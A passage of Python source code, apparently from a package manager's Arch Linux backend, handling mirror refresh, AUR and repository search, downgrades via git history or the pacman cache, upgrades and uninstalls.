country_opts = [InputOption(label=self.i18n['arch.custom_action.refresh_mirrors.location.all'], value='all',
tooltip=self.i18n['arch.custom_action.refresh_mirrors.location.all.tip'])]
mapped_opts = [InputOption(label=' '.join((w.capitalize() for w in self.i18n[' '.join(c.split('_'))].split(' '))),
value=c) for c in available_countries]
mapped_opts.sort(key=lambda o: o.label)
if len(current_countries) == 1 and current_countries[0] == 'all':
default_opts = {country_opts[0]}
else:
default_opts = {o for o in mapped_opts if o.value in current_countries}
country_opts.extend(default_opts)
country_opts.extend((o for o in mapped_opts if o not in default_opts))
select = MultipleSelectComponent(options=country_opts,
default_options=default_opts,
max_per_line=3,
label=self.i18n['arch.custom_action.refresh_mirrors.select_label'])
if watcher.request_confirmation(title=self.i18n['arch.custom_action.refresh_mirrors'],
body=None,
components=[select],
confirmation_label=self.i18n['continue'].capitalize(),
deny_label=self.i18n["cancel"].capitalize()):
countries = select.get_selected_values()
if 'all' in countries or len(countries) == len(available_countries):
countries = ['all']
else:
watcher.print("Aborted by the user")
return False
watcher.change_substatus(self.i18n['arch.custom_action.refresh_mirrors.status.updating'])
if current_countries == countries:
success, output = handler.handle_simple(pacman.refresh_mirrors(root_password))
else:
success, output = handler.handle_simple(pacman.update_mirrors(root_password, countries))
if not success:
watcher.show_message(title=self.i18n["action.failed"].capitalize(),
body=self.i18n['arch.custom_action.refresh_mirrors.failed'],
type_=MessageType.ERROR)
return False
sort_limit = self.configman.get_config()['mirrors_sort_limit']
if sort_limit is not None and isinstance(sort_limit, int) and sort_limit >= 0:
watcher.change_substatus(self.i18n['arch.custom_action.refresh_mirrors.status.sorting'])
handler.handle_simple(pacman.sort_fastest_mirrors(root_password, sort_limit))
mirrors.register_sync(self.logger)
watcher.change_substatus(self.i18n['arch.sync_databases.substatus'])
return self.sync_databases(root_password=root_password, watcher=watcher)
def sync_databases(self, root_password: str, watcher: ProcessWatcher) -> bool:
handler = ProcessHandler(watcher)
if self._is_database_locked(handler, root_password):
return False
success, output = handler.handle_simple(pacman.sync_databases(root_password, force=True))
if not success:
watcher.show_message(title=self.i18n["action.failed"].capitalize(),
body=self.i18n['arch.custom_action.refresh_mirrors.failed'],
type_=MessageType.ERROR)
return False
database.register_sync(self.logger)
return True
def _fill_repos_search_results(self, query: str, output: dict):
ti = time.time()
output['repositories'] = pacman.search(query)
tf = time.time()
self.logger.info("Repositories search took {0:.2f} seconds".format(tf - ti))
def _fill_aur_search_results(self, query: str, output: dict):
ti = time.time()
api_res = self.aur_client.search(query)
pkgs_found = None
if api_res and api_res.get('results'):
pkgs_found = api_res['results']
else:
tii = time.time()
if self.index_aur:
self.index_aur.join()
aur_index = self.aur_client.read_local_index()
if aur_index:
self.logger.info("Querying through the local AUR index")
to_query = set()
for norm_name, real_name in aur_index.items():
if query in norm_name:
to_query.add(real_name)
if len(to_query) == 25:
break
pkgs_found = self.aur_client.get_info(to_query)
tif = time.time()
self.logger.info("Query through local AUR index took {0:.2f} seconds".format(tif - tii))
if pkgs_found:
for pkg in pkgs_found:
output['aur'][pkg['Name']] = pkg
tf = time.time()
self.logger.info("AUR search took {0:.2f} seconds".format(tf - ti))
def __fill_search_installed_and_matched(self, query: str, res: dict):
matches = set()
installed = pacman.list_installed_names()
res['installed'] = installed
res['installed_matches'] = matches
if installed and ' ' not in query: # already filling some matches only based on the query
matches.update((name for name in installed if query in name))
def search(self, words: str, disk_loader: DiskCacheLoader, limit: int = -1, is_url: bool = False) -> SearchResult:
if is_url:
return SearchResult.empty()
arch_config = self.configman.get_config()
repos_supported, aur_supported = arch_config['repositories'], aur.is_supported(arch_config)
if not any([repos_supported, aur_supported]):
return SearchResult.empty()
res = SearchResult.empty()
search_output, search_threads = {'aur': {}, 'repositories': {}}, []
t = Thread(target=self.__fill_search_installed_and_matched, args=(words, search_output), daemon=True)
t.start()
search_threads.append(t)
if aur_supported:
aur_query = self.get_aur_semantic_search_map().get(words, words)
taur = Thread(target=self._fill_aur_search_results, args=(aur_query, search_output), daemon=True)
taur.start()
search_threads.append(taur)
if repos_supported:
trepo = Thread(target=self._fill_repos_search_results, args=(words, search_output), daemon=True)
trepo.start()
search_threads.append(trepo)
for t in search_threads:
t.join()
for name in {*search_output['repositories'].keys(), *search_output['aur'].keys()}:
if name in search_output['installed']:
search_output['installed_matches'].add(name)
if search_output['installed_matches']:
installed = self.read_installed(disk_loader=disk_loader, names=search_output['installed_matches']).installed
for pkg in installed:
if pkg.repository != 'aur':
if repos_supported:
res.installed.append(pkg)
if pkg.name in search_output['repositories']:
del search_output['repositories'][pkg.name]
elif aur_supported:
res.installed.append(pkg)
if pkg.name in search_output['aur']:
del search_output['aur'][pkg.name]
if search_output['repositories']:
for pkgname, data in search_output['repositories'].items():
res.new.append(ArchPackage(name=pkgname, i18n=self.i18n, **data))
if search_output['aur']:
for pkgname, apidata in search_output['aur'].items():
res.new.append(self.aur_mapper.map_api_data(apidata, None, self.categories))
res.update_total()
return res
def _fill_aur_pkgs(self, aur_pkgs: dict, output: List[ArchPackage], disk_loader: DiskCacheLoader, internet_available: bool,
arch_config: dict, rebuild_check: Optional[Thread], rebuild_ignored: Optional[Thread], rebuild_output: Optional[Dict[str, Set[str]]]):
if internet_available:
try:
pkgsinfo = self.aur_client.get_info(aur_pkgs.keys())
except requests.exceptions.ConnectionError:
self.logger.warning('Could not retrieve installed AUR packages API data. It seems the internet connection is off.')
self.logger.info("Reading only local AUR packages data")
return
if pkgsinfo:
editable_pkgbuilds = self._read_editable_pkgbuilds() if arch_config['edit_aur_pkgbuild'] is not False else None
ignore_rebuild_check = None
if rebuild_ignored and rebuild_output is not None:
rebuild_ignored.join()
ignore_rebuild_check = rebuild_output['ignored']
to_rebuild = None
if rebuild_check and rebuild_output is not None:
self.logger.info("Waiting for rebuild-detector")
rebuild_check.join()
to_rebuild = rebuild_output['to_rebuild']
for pkgdata in pkgsinfo:
pkg = self.aur_mapper.map_api_data(pkgdata, aur_pkgs, self.categories)
pkg.pkgbuild_editable = pkg.name in editable_pkgbuilds if editable_pkgbuilds is not None else None
if pkg.installed:
if disk_loader:
disk_loader.fill(pkg, sync=True)
pkg.update = self._check_aur_package_update(pkg=pkg,
installed_data=aur_pkgs.get(pkg.name, {}),
api_data=pkgdata)
pkg.aur_update = pkg.update # used in 'set_rebuild_check'
if ignore_rebuild_check is not None:
pkg.allow_rebuild = pkg.name not in ignore_rebuild_check
if to_rebuild and not pkg.update and pkg.name in to_rebuild:
pkg.require_rebuild = True
pkg.update_state()
pkg.status = PackageStatus.READY
output.append(pkg)
else:
editable_pkgbuilds = self._read_editable_pkgbuilds() if arch_config['edit_aur_pkgbuild'] is not False else None
for name, data in aur_pkgs.items():
pkg = ArchPackage(name=name, version=data.get('version'),
latest_version=data.get('version'), description=data.get('description'),
installed=True, repository='aur', i18n=self.i18n)
pkg.categories = self.categories.get(pkg.name)
pkg.pkgbuild_editable = pkg.name in editable_pkgbuilds if editable_pkgbuilds is not None else None
if disk_loader:
disk_loader.fill(pkg)
pkg.status = PackageStatus.READY
output.append(pkg)
def _check_aur_package_update(self, pkg: ArchPackage, installed_data: dict, api_data: dict) -> bool:
if pkg.last_modified is None: # if last_modified is not available, then the install_date will be used instead
install_date = installed_data.get('install_date')
if install_date:
try:
pkg.install_date = datetime_as_milis(parse_date(install_date))
except ValueError:
self.logger.error("Could not parse 'install_date' ({}) from AUR package '{}'".format(install_date, pkg.name))
else:
self.logger.error("AUR package '{}' install_date was not retrieved".format(pkg.name))
return self.aur_mapper.check_update(pkg=pkg, last_modified=api_data['LastModified'])
def _fill_repo_updates(self, updates: dict):
updates.update(pacman.list_repository_updates())
def _fill_repo_pkgs(self, repo_pkgs: dict, pkgs: list, aur_index: Optional[Set[str]], disk_loader: DiskCacheLoader):
updates = {}
thread_updates = Thread(target=self._fill_repo_updates, args=(updates,), daemon=True)
thread_updates.start()
repo_map = pacman.map_repositories(repo_pkgs)
thread_updates.join()
self.logger.info("Repository updates found" if updates else "No repository updates found")
for name, data in repo_pkgs.items():
pkgversion = data.get('version')
pkgrepo = repo_map.get(name)
pkg = ArchPackage(name=name,
version=pkgversion,
latest_version=pkgversion,
description=data.get('description'),
maintainer=pkgrepo,
i18n=self.i18n,
installed=True,
repository=pkgrepo,
categories=self.categories.get(name, []))
if updates:
update_version = updates.get(pkg.name)
if update_version:
pkg.latest_version = update_version
pkg.update = True
if disk_loader:
disk_loader.fill(pkg, sync=True)
if pkg.repository == 'aur':
pkg.repository = None
if aur_index and pkg.name not in aur_index:
removed_cat = self.i18n['arch.category.remove_from_aur']
if removed_cat not in pkg.categories:
pkg.categories.append(removed_cat)
pkgs.append(pkg)
def _wait_for_disk_cache(self):
if self.disk_cache_updater and self.disk_cache_updater.is_alive():
self.logger.info("Waiting for disk cache to be ready")
self.disk_cache_updater.join()
self.logger.info("Disk cache ready")
def __fill_packages_to_rebuild(self, output: Dict[str, Set[str]], ignore_binaries: bool):
if rebuild_detector.is_installed():
self.logger.info("rebuild-detector: checking")
to_rebuild = rebuild_detector.list_required_rebuild()
if to_rebuild and ignore_binaries:
to_rebuild = {p for p in to_rebuild if not RE_PKG_ENDS_WITH_BIN.match(p)}
output['to_rebuild'].update(to_rebuild)
self.logger.info("rebuild-detector: {} packages require rebuild".format(len(to_rebuild)))
def __fill_ignored_by_rebuild_detector(self, output: Dict[str, Set[str]]):
output['ignored'].update(rebuild_detector.list_ignored())
def read_installed(self, disk_loader: Optional[DiskCacheLoader], limit: int = -1, only_apps: bool = False, pkg_types: Set[Type[SoftwarePackage]] = None, internet_available: bool = None, names: Iterable[str] = None, wait_disk_cache: bool = True) -> SearchResult:
self.aur_client.clean_caches()
arch_config = self.configman.get_config()
aur_supported, repos_supported = aur.is_supported(arch_config), arch_config['repositories']
if not aur_supported and not repos_supported:
return SearchResult.empty()
rebuild_output, rebuild_check, rebuild_ignored = None, None, None
if aur_supported and arch_config['aur_rebuild_detector']:
rebuild_output = {'to_rebuild': set(), 'ignored': set()}
rebuild_check = Thread(target=self.__fill_packages_to_rebuild,
args=(rebuild_output, arch_config['aur_rebuild_detector_no_bin']),
daemon=True)
rebuild_check.start()
rebuild_ignored = Thread(target=self.__fill_ignored_by_rebuild_detector, args=(rebuild_output, ), daemon=True)
rebuild_ignored.start()
installed = pacman.map_installed(names=names)
aur_pkgs, repo_pkgs, aur_index = None, None, None
if repos_supported:
repo_pkgs = installed['signed']
if installed['not_signed']:
if aur_supported:
if self.index_aur:
self.index_aur.join()
aur_index = self.aur_client.read_index()
for pkg in {*installed['not_signed']}:
if pkg not in aur_index:
if repos_supported:
repo_pkgs[pkg] = installed['not_signed'][pkg]
if aur_supported and installed['not_signed']:
del installed['not_signed'][pkg]
aur_pkgs = installed['not_signed']
elif repos_supported:
repo_pkgs.update(installed['not_signed'])
pkgs = []
if repo_pkgs or aur_pkgs:
if wait_disk_cache:
self._wait_for_disk_cache()
map_threads = []
if aur_pkgs:
t = Thread(target=self._fill_aur_pkgs, args=(aur_pkgs, pkgs, disk_loader, internet_available, arch_config, rebuild_check, rebuild_ignored, rebuild_output), daemon=True)
t.start()
map_threads.append(t)
if repo_pkgs:
t = Thread(target=self._fill_repo_pkgs, args=(repo_pkgs, pkgs, aur_index, disk_loader), daemon=True)
t.start()
map_threads.append(t)
for t in map_threads:
t.join()
if pkgs:
ignored = self._list_ignored_updates()
if ignored:
for p in pkgs:
if p.name in ignored:
p.update_ignored = True
return SearchResult(pkgs, None, len(pkgs))
def _downgrade_aur_pkg(self, context: TransactionContext):
if context.commit:
self.logger.info("Package '{}' current commit {}".format(context.name, context.commit))
else:
self.logger.warning("Package '{}' has no commit associated with it. Downgrading will only compare versions.".format(context.name))
context.build_dir = '{}/build_{}'.format(get_build_dir(context.config), int(time.time()))
try:
if not os.path.exists(context.build_dir):
build_dir = context.handler.handle(SystemProcess(new_subprocess(['mkdir', '-p', context.build_dir])))
if build_dir:
context.handler.watcher.change_progress(10)
base_name = context.get_base_name()
context.watcher.change_substatus(self.i18n['arch.clone'].format(bold(context.name)))
cloned, _ = context.handler.handle_simple(git.clone_as_process(url=URL_GIT.format(base_name), cwd=context.build_dir))
context.watcher.change_progress(30)
if cloned:
context.watcher.change_substatus(self.i18n['arch.downgrade.reading_commits'])
clone_path = '{}/{}'.format(context.build_dir, base_name)
context.project_dir = clone_path
srcinfo_path = '{}/.SRCINFO'.format(clone_path)
logs = git.log_shas_and_timestamps(clone_path)
context.watcher.change_progress(40)
if not logs or len(logs) == 1:
context.watcher.show_message(title=self.i18n['arch.downgrade.error'],
body=self.i18n['arch.downgrade.impossible'].format(context.name),
type_=MessageType.ERROR)
return False
if context.commit:
target_commit, target_commit_timestamp = None, None
for idx, log in enumerate(logs):
if context.commit == log[0] and idx + 1 < len(logs):
target_commit = logs[idx + 1][0]
target_commit_timestamp = logs[idx + 1][1]
break
if not target_commit:
self.logger.warning("Could not find '{}' target commit to revert to".format(context.name))
else:
context.watcher.change_substatus(self.i18n['arch.downgrade.version_found'])
checkout_proc = new_subprocess(['git', 'checkout', target_commit], cwd=clone_path)
if not context.handler.handle(SystemProcess(checkout_proc, check_error_output=False)):
context.watcher.print("Could not rollback to current version's commit")
return False
context.watcher.change_substatus(self.i18n['arch.downgrade.install_older'])
context.last_modified = target_commit_timestamp
context.commit = target_commit
return self._build(context)
# trying to downgrade by version comparison
commit_found, commit_date = None, None
srcfields = {'pkgver', 'pkgrel', 'epoch'}
for idx in range(1, len(logs)):
commit, date = logs[idx][0], logs[idx][1]
with open(srcinfo_path) as f:
pkgsrc = aur.map_srcinfo(string=f.read(), pkgname=context.name, fields=srcfields)
reset_proc = new_subprocess(['git', 'reset', '--hard', commit], cwd=clone_path)
if not context.handler.handle(SystemProcess(reset_proc, check_error_output=False)):
context.handler.watcher.print('Could not downgrade anymore. Aborting...')
return False
epoch, version, release = pkgsrc.get('epoch'), pkgsrc.get('pkgver'), pkgsrc.get('pkgrel')
if epoch:
current_version = '{}:{}-{}'.format(epoch, version, release)
else:
current_version = '{}-{}'.format(version, release)
if commit_found:
context.watcher.change_substatus(self.i18n['arch.downgrade.version_found'])
checkout_proc = new_subprocess(['git', 'checkout', commit_found], cwd=clone_path)
if not context.handler.handle(SystemProcess(checkout_proc, check_error_output=False)):
context.watcher.print("Could not rollback to current version's commit")
return False
reset_proc = new_subprocess(['git', 'reset', '--hard', commit_found], cwd=clone_path)
if not context.handler.handle(SystemProcess(reset_proc, check_error_output=False)):
context.watcher.print("Could not downgrade to previous commit of '{}'. Aborting...".format(commit_found))
return False
break
elif current_version == context.get_version(): # current version found:
commit_found, commit_date = commit, date
context.watcher.change_substatus(self.i18n['arch.downgrade.install_older'])
context.last_modified = commit_date
context.commit = commit_found
return self._build(context)
finally:
if os.path.exists(context.build_dir) and context.config['aur_remove_build_dir']:
context.handler.handle(SystemProcess(subproc=new_subprocess(['rm', '-rf', context.build_dir])))
return False
def _downgrade_repo_pkg(self, context: TransactionContext):
context.watcher.change_substatus(self.i18n['arch.downgrade.searching_stored'])
if not os.path.isdir('/var/cache/pacman/pkg'):
context.watcher.show_message(title=self.i18n['arch.downgrade.error'],
body=self.i18n['arch.downgrade.repo_pkg.no_versions'],
type_=MessageType.ERROR)
return False
available_files = glob.glob("/var/cache/pacman/pkg/{}-*.pkg.tar.*".format(context.name))
if not available_files:
context.watcher.show_message(title=self.i18n['arch.downgrade.error'],
body=self.i18n['arch.downgrade.repo_pkg.no_versions'],
type_=MessageType.ERROR)
return False
reg = re.compile(r'{}-([\w.\-]+)-(x86_64|any|i686).pkg'.format(context.name))
versions, version_files = [], {}
for file_path in available_files:
found = reg.findall(os.path.basename(file_path))
if found:
ver = found[0][0]
if ver not in versions and ver < context.get_version():
versions.append(ver)
version_files[ver] = file_path
context.watcher.change_progress(40)
if not versions:
context.watcher.show_message(title=self.i18n['arch.downgrade.error'],
body=self.i18n['arch.downgrade.repo_pkg.no_versions'],
type_=MessageType.ERROR)
return False
versions.sort(reverse=True)
context.watcher.change_progress(50)
context.install_files = version_files[versions[0]] # TODO verify
if not self._handle_missing_deps(context=context):
return False
context.watcher.change_substatus(self.i18n['arch.downgrade.install_older'])
context.watcher.change_progress(60)
return self._install(context)
def downgrade(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher) -> bool:
self.aur_client.clean_caches()
if not self._check_action_allowed(pkg, watcher):
return False
handler = ProcessHandler(watcher)
if self._is_database_locked(handler, root_password):
return False
arch_config = self.configman.get_config()
aur_supported = pkg.repository == 'aur' or aur.is_supported(arch_config)
context = TransactionContext(name=pkg.name, base=pkg.get_base_name(), skip_opt_deps=True,
change_progress=True, dependency=False, repository=pkg.repository, pkg=pkg,
arch_config=arch_config, watcher=watcher, handler=handler, root_password=root_password,
installed=set(), removed={},
aur_supported=aur_supported,
commit=pkg.commit)
self._sync_databases(arch_config=context.config, aur_supported=aur_supported,
root_password=root_password, handler=handler)
watcher.change_progress(5)
if pkg.repository == 'aur':
return self._downgrade_aur_pkg(context)
else:
return self._downgrade_repo_pkg(context)
def clean_cache_for(self, pkg: ArchPackage):
if os.path.exists(pkg.get_disk_cache_path()):
shutil.rmtree(pkg.get_disk_cache_path())
def _check_action_allowed(self, pkg: ArchPackage, watcher: ProcessWatcher) -> bool:
if user.is_root() and pkg.repository == 'aur':
watcher.show_message(title=self.i18n['arch.install.aur.root_error.title'],
body=self.i18n['arch.install.aur.root_error.body'],
type_=MessageType.ERROR)
return False
return True
def _is_database_locked(self, handler: ProcessHandler, root_password: str) -> bool:
if os.path.exists('/var/lib/pacman/db.lck'):
handler.watcher.print('pacman database is locked')
msg = '<p>{}</p><p>{}</p><br/>'.format(self.i18n['arch.action.db_locked.body.l1'],
self.i18n['arch.action.db_locked.body.l2'])
if handler.watcher.request_confirmation(title=self.i18n['arch.action.db_locked.title'].capitalize(),
body=msg,
confirmation_label=self.i18n['arch.action.db_locked.confirmation'].capitalize(),
deny_label=self.i18n['cancel'].capitalize()):
try:
if not handler.handle_simple(SimpleProcess(['rm', '-rf', '/var/lib/pacman/db.lck'], root_password=root_password)):
handler.watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['arch.action.db_locked.error'],
type_=MessageType.ERROR)
return True
except:
self.logger.error("An error occurred while removing the pacman database lock")
traceback.print_exc()
handler.watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['arch.action.db_locked.error'],
type_=MessageType.ERROR)
return True
else:
handler.watcher.print('Action cancelled by the user. Aborting...')
return True
return False
def _map_conflicting_file(self, output: str) -> List[MultipleSelectComponent]:
error_idx = None
lines = output.split('\n')
for idx, l in enumerate(lines):
if l and l.strip().lower().startswith('error: failed to commit transaction (conflicting files)'):
error_idx = idx
break
files = []
if error_idx and error_idx + 1 < len(lines):
for idx in range(error_idx + 1, len(lines)):
line = lines[idx].strip()
if line and self.re_file_conflict.match(line):
files.append(InputOption(label=line, value=idx, read_only=True))
return [MultipleSelectComponent(options=files, default_options={*files}, label='')]
def _map_dependencies_breakage(self, output: str) -> List[ViewComponent]:
errors = RE_DEPENDENCY_BREAKAGE.findall(output)
if errors:
opts = []
for idx, err in enumerate(errors):
opts.append(InputOption(label=self.i18n['arch.upgrade.error.dep_breakage.item'].format(*err), value=idx, read_only=True))
return [MultipleSelectComponent(label='',
options=opts,
default_options={*opts})]
else:
return [TextComponent(output)]
def list_related(self, pkgs: Collection[str], all_pkgs: Collection[str], data: Dict[str, dict], related: Set[str], provided_map: Dict[str, Set[str]]) -> Set[str]:
related.update(pkgs)
deps = set()
for pkg in pkgs:
pkg_deps = data[pkg]['d']
if pkg_deps:
deps.update({d for d in pkg_deps if d not in related})
if deps:
if not provided_map:
for p in all_pkgs:
for provided in data[p].get('p', {p}):
sources = provided_map.get(provided, set())
provided_map[provided] = sources
sources.add(p)
added_sources = set()
for dep in deps:
sources = provided_map.get(dep)
if sources:
for source in sources:
if source not in related:
related.add(source)
added_sources.add(source)
if added_sources:
self.list_related(added_sources, all_pkgs, data, related, provided_map)
return related
def _upgrade_repo_pkgs(self, to_upgrade: List[str], to_remove: Optional[Set[str]], handler: ProcessHandler, root_password: str,
multithread_download: bool, pkgs_data: Dict[str, dict], overwrite_files: bool = False,
status_handler: TransactionStatusHandler = None, sizes: Dict[str, int] = None, download: bool = True,
check_syncfirst: bool = True, skip_dependency_checks: bool = False) -> bool:
self.logger.info("Total packages to upgrade: {}".format(len(to_upgrade)))
to_sync_first = None
if check_syncfirst:
to_sync_first = [p for p in pacman.get_packages_to_sync_first() if p.endswith('-keyring') and p in to_upgrade]
self.logger.info("Packages detected to upgrade firstly: {}".format(len(to_sync_first)))
if to_sync_first:
self.logger.info("Upgrading keyrings marked as 'SyncFirst'")
if not self._upgrade_repo_pkgs(to_upgrade=to_sync_first,
to_remove=None,
handler=handler,
root_password=root_password,
sizes=sizes,
download=True,
multithread_download=multithread_download,
pkgs_data=pkgs_data,
check_syncfirst=False):
return False
to_upgrade_remaining = [p for p in to_upgrade if p not in to_sync_first] if to_sync_first else to_upgrade
self.logger.info("Packages remaining to upgrade: {}".format(len(to_upgrade_remaining)))
# pre-downloading all packages before removing any
if download and to_upgrade_remaining:
try:
downloaded = self._download_packages(pkgnames=to_upgrade_remaining,
handler=handler,
root_password=root_password,
sizes=sizes,
multithreaded=multithread_download)
if downloaded < len(to_upgrade_remaining):
self._show_upgrade_download_failed(handler.watcher)
return False
except ArchDownloadException:
self._show_upgrade_download_failed(handler.watcher)
return False
if to_remove and not self._remove_transaction_packages(to_remove, handler, root_password):
return False
if not to_upgrade_remaining:
return True
try:
if status_handler:
output_handler = status_handler
else:
output_handler = TransactionStatusHandler(handler.watcher, self.i18n, {*to_upgrade_remaining}, self.logger, downloading=len(to_upgrade_remaining))
output_handler.start()
self.logger.info("Upgrading {} repository packages: {}".format(len(to_upgrade_remaining), ', '.join(to_upgrade_remaining)))
success, upgrade_output = handler.handle_simple(pacman.upgrade_several(pkgnames=to_upgrade_remaining,
root_password=root_password,
overwrite_conflicting_files=overwrite_files,
skip_dependency_checks=skip_dependency_checks),
output_handler=output_handler.handle)
handler.watcher.change_substatus('')
if success:
output_handler.stop_working()
output_handler.join()
handler.watcher.print("Repository packages successfully upgraded")
handler.watcher.change_substatus(self.i18n['arch.upgrade.caching_pkgs_data'])
repo_map = pacman.map_repositories(to_upgrade_remaining)
pkg_map = {}
for name in to_upgrade_remaining:
repo = repo_map.get(name)
pkg_map[name] = ArchPackage(name=name,
repository=repo,
maintainer=repo,
categories=self.categories.get(name))
disk.write_several(pkgs=pkg_map, overwrite=True, maintainer=None)
return True
elif 'conflicting files' in upgrade_output:
if not handler.watcher.request_confirmation(title=self.i18n['warning'].capitalize(),
body=self.i18n['arch.upgrade.error.conflicting_files'] + ':',
deny_label=self.i18n['arch.upgrade.conflicting_files.proceed'],
confirmation_label=self.i18n['arch.upgrade.conflicting_files.stop'],
components=self._map_conflicting_file(upgrade_output)):
return self._upgrade_repo_pkgs(to_upgrade=to_upgrade_remaining,
handler=handler,
root_password=root_password,
overwrite_files=True,
status_handler=output_handler,
multithread_download=multithread_download,
download=False,
check_syncfirst=False,
pkgs_data=pkgs_data,
to_remove=None,
sizes=sizes,
skip_dependency_checks=skip_dependency_checks)
else:
output_handler.stop_working()
output_handler.join()
handler.watcher.print("Aborted by the user")
return False
elif ' breaks dependency ' in upgrade_output:
if not handler.watcher.request_confirmation(title=self.i18n['warning'].capitalize(),
body=self.i18n['arch.upgrade.error.dep_breakage'] + ':',
deny_label=self.i18n['arch.upgrade.error.dep_breakage.proceed'],
confirmation_label=self.i18n['arch.upgrade.error.dep_breakage.stop'],
components=self._map_dependencies_breakage(upgrade_output)):
return self._upgrade_repo_pkgs(to_upgrade=to_upgrade_remaining,
handler=handler,
root_password=root_password,
overwrite_files=overwrite_files,
status_handler=output_handler,
multithread_download=multithread_download,
download=False,
check_syncfirst=False,
pkgs_data=pkgs_data,
to_remove=None,
sizes=sizes,
skip_dependency_checks=True)
else:
output_handler.stop_working()
output_handler.join()
handler.watcher.print("Aborted by the user")
return False
else:
output_handler.stop_working()
output_handler.join()
self.logger.error("'pacman' returned an unexpected response or error phrase after upgrading the repository packages")
return False
except:
handler.watcher.change_substatus('')
handler.watcher.print("An error occurred while upgrading repository packages")
self.logger.error("An error occurred while upgrading repository packages")
traceback.print_exc()
return False
def _remove_transaction_packages(self, to_remove: Set[str], handler: ProcessHandler, root_password: str) -> bool:
output_handler = TransactionStatusHandler(watcher=handler.watcher,
i18n=self.i18n,
names=set(),
logger=self.logger,
pkgs_to_remove=len(to_remove))
output_handler.start()
try:
success, _ = handler.handle_simple(pacman.remove_several(pkgnames=to_remove,
root_password=root_password,
skip_checks=True),
output_handler=output_handler.handle)
if not success:
self.logger.error("Could not remove packages: {}".format(', '.join(to_remove)))
output_handler.stop_working()
output_handler.join()
return False
return True
except:
self.logger.error("An error occurred while removing packages: {}".format(', '.join(to_remove)))
traceback.print_exc()
output_handler.stop_working()
output_handler.join()
return False
def _show_upgrade_download_failed(self, watcher: ProcessWatcher):
watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['arch.upgrade.mthreaddownload.fail'],
type_=MessageType.ERROR)
def upgrade(self, requirements: UpgradeRequirements, root_password: str, watcher: ProcessWatcher) -> bool:
self.aur_client.clean_caches()
watcher.change_status("{}...".format(self.i18n['manage_window.status.upgrading']))
handler = ProcessHandler(watcher)
if self._is_database_locked(handler, root_password):
watcher.change_substatus('')
return False
aur_pkgs, repo_pkgs, pkg_sizes = [], [], {}
for req in (*requirements.to_install, *requirements.to_upgrade):
if req.pkg.repository == 'aur':
aur_pkgs.append(req.pkg)
else:
repo_pkgs.append(req.pkg)
pkg_sizes[req.pkg.name] = req.required_size
if aur_pkgs and not self._check_action_allowed(aur_pkgs[0], watcher):
return False
arch_config = self.configman.get_config()
aur_supported = bool(aur_pkgs) or aur.is_supported(arch_config)
self._sync_databases(arch_config=arch_config, aur_supported=aur_supported,
root_password=root_password, handler=handler)
if repo_pkgs:
if not self._upgrade_repo_pkgs(to_upgrade=[p.name for p in repo_pkgs],
to_remove={r.pkg.name for r in requirements.to_remove} if requirements.to_remove else None,
handler=handler,
root_password=root_password,
multithread_download=self._multithreaded_download_enabled(arch_config),
pkgs_data=requirements.context['data'],
sizes=pkg_sizes):
return False
elif requirements.to_remove and not self._remove_transaction_packages({r.pkg.name for r in requirements.to_remove}, handler, root_password):
return False
if aur_pkgs:
watcher.change_status('{}...'.format(self.i18n['arch.upgrade.upgrade_aur_pkgs']))
self.logger.info("Retrieving the 'last_modified' field for each package to upgrade")
pkgs_api_data = self.aur_client.get_info({p.name for p in aur_pkgs})
if not pkgs_api_data:
self.logger.warning("Could not retrieve the 'last_modified' fields from the AUR API during the upgrade process")
any_upgraded = False
for pkg in aur_pkgs:
watcher.change_substatus("{} {} ({})...".format(self.i18n['manage_window.status.upgrading'], pkg.name, pkg.version))
if pkgs_api_data:
apidata = [p for p in pkgs_api_data if p.get('Name') == pkg.name]
if not apidata:
self.logger.warning("AUR API data from package '{}' could not be found".format(pkg.name))
else:
self.aur_mapper.fill_last_modified(pkg=pkg, api_data=apidata[0])
context = TransactionContext.gen_context_from(pkg=pkg, arch_config=arch_config,
root_password=root_password, handler=handler, aur_supported=True)
context.change_progress = False
try:
if not self.install(pkg=pkg, root_password=root_password, watcher=watcher, disk_loader=None, context=context).success:
if any_upgraded:
self._update_aur_index(watcher)
watcher.print(self.i18n['arch.upgrade.fail'].format('"{}"'.format(pkg.name)))
self.logger.error("Could not upgrade AUR package '{}'".format(pkg.name))
watcher.change_substatus('')
return False
else:
any_upgraded = True
watcher.print(self.i18n['arch.upgrade.success'].format('"{}"'.format(pkg.name)))
except:
if any_upgraded:
self._update_aur_index(watcher)
watcher.print(self.i18n['arch.upgrade.fail'].format('"{}"'.format(pkg.name)))
watcher.change_substatus('')
self.logger.error("An error occurred when upgrading AUR package '{}'".format(pkg.name))
traceback.print_exc()
return False
if any_upgraded:
self._update_aur_index(watcher)
watcher.change_substatus('')
return True
def _uninstall_pkgs(self, pkgs: Iterable[str], root_password: str, handler: ProcessHandler, ignore_dependencies: bool = False) -> bool:
status_handler = TransactionStatusHandler(watcher=handler.watcher,
i18n=self.i18n,
names={*pkgs},
logger=self.logger,
pkgs_to_remove=len(pkgs))
cmd = ['pacman', '-R', *pkgs, '--noconfirm']
if ignore_dependencies:
cmd.append('-dd')
status_handler.start()
all_uninstalled, _ = handler.handle_simple(SimpleProcess(cmd=cmd,
root_password=root_password,
error_phrases={'error: failed to prepare transaction',
'error: failed to commit transaction'},
shell=True),
output_handler=status_handler.handle)
status_handler.stop_working()
status_handler.join()
installed = pacman.list_installed_names()
for p in pkgs:
if p not in installed:
cache_path = ArchPackage.disk_cache_path(p)
if os.path.exists(cache_path):
shutil.rmtree(cache_path)
return all_uninstalled
def _request_uninstall_confirmation(self, to_uninstall: Collection[str], required: Collection[str], watcher: ProcessWatcher) -> bool:
reqs = [InputOption(label=p, value=p, icon_path=get_icon_path(), read_only=True) for p in required]
reqs_select = MultipleSelectComponent(options=reqs, default_options=set(reqs), label="", max_per_line=1 if len(reqs) < 4 else 3)
msg = '<p>{}</p><p>{}</p>'.format(self.i18n['arch.uninstall.required_by'].format(bold(str(len(required))), ', '.join(bold(n)for n in to_uninstall)) + '.',
self.i18n['arch.uninstall.required_by.advice'] + '.')
if not watcher.request_confirmation(title=self.i18n['warning'].capitalize(),
body=msg,
components=[reqs_select],
confirmation_label=self.i18n['proceed'].capitalize(),
deny_label=self.i18n['cancel'].capitalize(),
window_cancel=False):
watcher.print("Aborted")
return False
return True
